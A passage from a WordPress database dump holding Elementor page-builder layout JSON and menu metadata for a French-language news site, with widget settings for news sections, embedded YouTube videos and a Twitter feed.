e_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1568,523,'_elementor_version','0.4'),(1569,523,'_elementor_css','a:3:{s:4:\"time\";i:1508936143;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1573,360,'_oembed_c827519932694227bf7bcd00b4bd599c','{{unknown}}'),(1574,526,'_edit_last','1'),(1575,526,'_edit_lock','1509551179:1'),(1576,526,'_wp_page_template','default'),(1577,528,'_menu_item_type','post_type'),(1578,528,'_menu_item_menu_item_parent','0'),(1579,528,'_menu_item_object_id','526'),(1580,528,'_menu_item_object','page'),(1581,528,'_menu_item_target',''),(1582,528,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1583,528,'_menu_item_xfn',''),(1584,528,'_menu_item_url',''),(1585,528,'_menu_item_orphaned','1508938736'),(1586,529,'_menu_item_type','post_type'),(1587,529,'_menu_item_menu_item_parent','0'),(1588,529,'_menu_item_object_id','385'),(1589,529,'_menu_item_object','page'),(1590,529,'_menu_item_target',''),(1591,529,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1592,529,'_menu_item_xfn',''),(1593,529,'_menu_item_url',''),(1594,529,'_menu_item_orphaned','1508938736'),(1595,530,'_menu_item_type','post_type'),(1596,530,'_menu_item_menu_item_parent','0'),(1597,530,'_menu_item_object_id','383'),(1598,530,'_menu_item_object','page'),(1599,530,'_menu_item_target',''),(1600,530,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1601,530,'_menu_item_xfn',''),(1602,530,'_menu_item_url',''),(1603,530,'_menu_item_orphaned','1508938736'),(1604,531,'_menu_item_type','post_type'),(1605,531,'_menu_item_menu_item_parent','0'),(1606,531,'_menu_item_object_id','380'),(1607,531,'_menu_item_object','page'),(1608,531,'_menu_item_target',''),(1609,531,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1610,531,'_menu_item_xfn',''),(1611,531,'_menu_item_url',''),(1612,531,'_menu_item_orphaned','1508938736'),(1613,532,'_menu_item_type','post_type'),(1614,532,'_menu_item_menu_item_parent','0'),(1615,532,'_menu_item_object_id','378'),(1616,532,'_menu_item_object','page'),(1617,532,'_menu_item_target',''),(1618,532,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1619,532,'_menu_item_xfn',''),(1620,532,'_menu_item_url',''),(1621,532,'_menu_item_orphaned','1508938736'),(1622,533,'_menu_item_type','post_type'),(1623,533,'_menu_item_menu_item_parent','0'),(1624,533,'_menu_item_object_id','2'),(1625,533,'_menu_item_object','page'),(1626,533,'_menu_item_target',''),(1627,533,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1628,533,'_menu_item_xfn',''),(1629,533,'_menu_item_url',''),(1630,533,'_menu_item_orphaned','1508938736'),(1631,534,'_menu_item_type','post_type'),(1632,534,'_menu_item_menu_item_parent','0'),(1633,534,'_menu_item_object_id','363'),(1634,534,'_menu_item_object','page'),(1635,534,'_menu_item_target',''),(1636,534,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1637,534,'_menu_item_xfn',''),(1638,534,'_menu_item_url',''),(1639,534,'_menu_item_orphaned','1508938736'),(1640,535,'_menu_item_type','post_type'),(1641,535,'_menu_item_menu_item_parent','0'),(1642,535,'_menu_item_object_id','360'),(1643,535,'_menu_item_object','page'),(1644,535,'_menu_item_target',''),(1645,535,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1646,535,'_menu_item_xfn',''),(1647,535,'_menu_item_url',''),(1648,535,'_menu_item_orphaned','1508938737'),(1649,536,'_menu_item_type','post_type'),(1650,536,'_menu_item_menu_item_parent','0'),(1651,536,'_menu_item_object_id','359'),(1652,536,'_menu_item_object','page'),(1653,536,'_menu_item_target',''),(1654,536,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1655,536,'_menu_item_xfn',''),(1656,536,'_menu_item_url',''),(1658,538,'_edit_last','1'),(1659,538,'_wp_page_template','default'),(1660,538,'_edit_lock','1509552638:1'),(1688,543,'_menu_item_type','post_type'),(1689,543,'_menu_item_menu_item_parent','0'),(1690,543,'_menu_item_object_id','363'),(1691,543,'_menu_item_object','page'),(1692,543,'_menu_item_target',''),(1693,543,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1694,543,'_menu_item_xfn',''),(1695,543,'_menu_item_url',''),(1697,363,'_edit_lock','1509553728:1'),(1698,363,'_edit_last','1'),(1699,538,'_elementor_edit_mode','builder'),(1700,538,'_elementor_data','[{\"id\":\"fzhsu66\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5jp0ahv\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ojmyu9b\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"],\"category_border_color\":\"#ff5700\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#ff5700\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"rb3u4zv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ryk8l4\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1701,555,'_elementor_edit_mode','builder'),(1702,555,'_elementor_data','[{\"id\":\"fzhsu66\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5jp0ahv\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ojmyu9b\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"rb3u4zv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1703,538,'_elementor_version','0.4'),(1704,556,'_elementor_edit_mode','builder'),(1705,556,'_elementor_data','[{\"id\":\"fzhsu66\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5jp0ahv\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ojmyu9b\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"rb3u4zv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ryk8l4\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1706,556,'_elementor_version','0.4'),(1707,558,'_menu_item_type','post_type'),(1708,558,'_menu_item_menu_item_parent','0'),(1709,558,'_menu_item_object_id','538'),(1710,558,'_menu_item_object','page'),(1711,558,'_menu_item_target',''),(1712,558,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1713,558,'_menu_item_xfn',''),(1714,558,'_menu_item_url',''),(1717,559,'_elementor_edit_mode','builder'),(1718,559,'_elementor_data','[{\"id\":\"fzhsu66\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5jp0ahv\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ojmyu9b\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"rb3u4zv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ryk8l4\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"},{\"id\":\"fc150kw\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[custom-facebook-feed]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1719,559,'_elementor_version','0.4'),(1720,559,'_elementor_css','a:3:{s:4:\"time\";i:1508939833;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1722,560,'_elementor_edit_mode','builder'),(1723,560,'_elementor_data','[{\"id\":\"fzhsu66\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5jp0ahv\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ojmyu9b\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"1\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"rb3u4zv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ryk8l4\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1724,560,'_elementor_version','0.4'),(1725,560,'_elementor_css','a:3:{s:4:\"time\";i:1508940089;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1727,2,'_elementor_edit_mode','builder'),(1728,561,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1729,561,'_elementor_version','0.4'),(1730,561,'_elementor_css','a:3:{s:4:\"time\";i:1508891833;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1731,561,'_elementor_edit_mode','builder'),(1732,562,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1733,562,'_elementor_version','0.4'),(1734,562,'_elementor_edit_mode','builder'),(1736,563,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1737,563,'_elementor_version','0.4'),(1738,563,'_elementor_edit_mode','builder'),(1739,563,'_elementor_css','a:3:{s:4:\"time\";i:1508940284;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1741,564,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1742,564,'_elementor_version','0.4'),(1743,564,'_elementor_edit_mode','builder'),(1744,564,'_elementor_css','a:3:{s:4:\"time\";i:1508940316;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1746,565,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widg